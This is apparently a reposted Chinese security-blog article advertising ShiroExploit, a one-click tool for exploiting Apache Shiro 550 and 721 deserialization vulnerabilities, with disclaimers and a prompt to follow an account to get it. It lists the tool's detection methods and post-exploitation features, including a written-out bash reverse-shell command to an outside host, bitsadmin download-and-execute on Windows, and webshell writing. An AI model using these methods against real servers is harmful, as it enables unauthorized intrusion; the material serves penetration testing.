文章总结： 本文介绍了一款针对ApacheShiro框架漏洞的一键化利用工具ShiroExploit，支持Shiro550硬编码密钥和Shiro721PaddingOracle漏洞检测。工具提供多种检测方式包括ceye.io、dnslog.cn、JRMP+dnslog及回显方式，特别适用于不出网环境。支持命令执行、反弹shell(Linux/Windows)和写入webshell等功能。文章包含免责声明强调仅限授权测试，文末通过公众号引流获取工具。 综合评分： 65 文章分类： 漏洞POC,渗透测试,安全工具,漏洞分析,WEB安全

Shiro550Shiro721 一键化利用工具，支持多种回显方式

feihong-cs feihong-cs

W小哥

2026年2月8日 11:30 浙江

免责声明

文章内容仅限授权测试或学习使用请勿进行非法的测试或攻击，利用本账号所发文章进行直接或间接的非法行为，均由操作者本人负全责，W小哥及文章对应作者将不为此承担任何责任。

文章来自互联网或原创，如有侵权可联系我方进行删除，深感抱歉。

ShiroExploit

支持对Shiro550（硬编码秘钥）和Shiro721（Padding Oracle）的一键化检测，支持多种回显方式

使用说明

第二步: 选择攻击方式

选择 使用 ceye.io 进行漏洞检测

选择 使用 dnslog.cn 进行漏洞检测

选择 使用 JRMP + dnslog 进行漏洞检测

选择 使用回显进行漏洞检测

·针对不出网的情况进行漏洞检测，此时可以检测的 Gadget 类型会少于使用 DNSLog 方式的 Gadget类型

·程序会首先使用反序列化 SimplePrincipalCollection 的方式筛选出唯一 Key，然后依次判断可用的 Gadget 类型和回显方式

·支持多种回显方式，回显方式和代码请参考 deserizationEcho

·使用写文件回显方式时，可以提供一个静态资源 URL，程序会将此静态资源所在的目录当做写入目录，若不提供，则写入根目录

·测试 vulhub 拉取的镜像及 Windows下用 Tomcat 搭建的测试环境，结果如下  

第三步：检测漏洞并执行命令

·程序在判断目标应用是否存在漏洞时，窗口上部的输入框无法进行输入。当程序检测出目标应用存在漏洞时，输入框可以进行输入并执行命令。

·反弹shell（linux） 采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1 的方式反弹 shell

·反弹shell（Windows） 采用 bitsadmin 下载指定 URL 的 exe 文件并执行的方式获取 shell

·获取Webshell 直接在使用者给出的路径（目录需要真实存在）下写入 webshell, webshell 名称和后缀名由使用者自行指定，webshell 的内容从 config 目录下的 shell.jsp 中读取 

关注公众号回复“20260208”获取工具地址。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：W小哥 feihong-cs feihong-cs《Shiro550Shiro721 一键化利用工具，支持多种回显方式》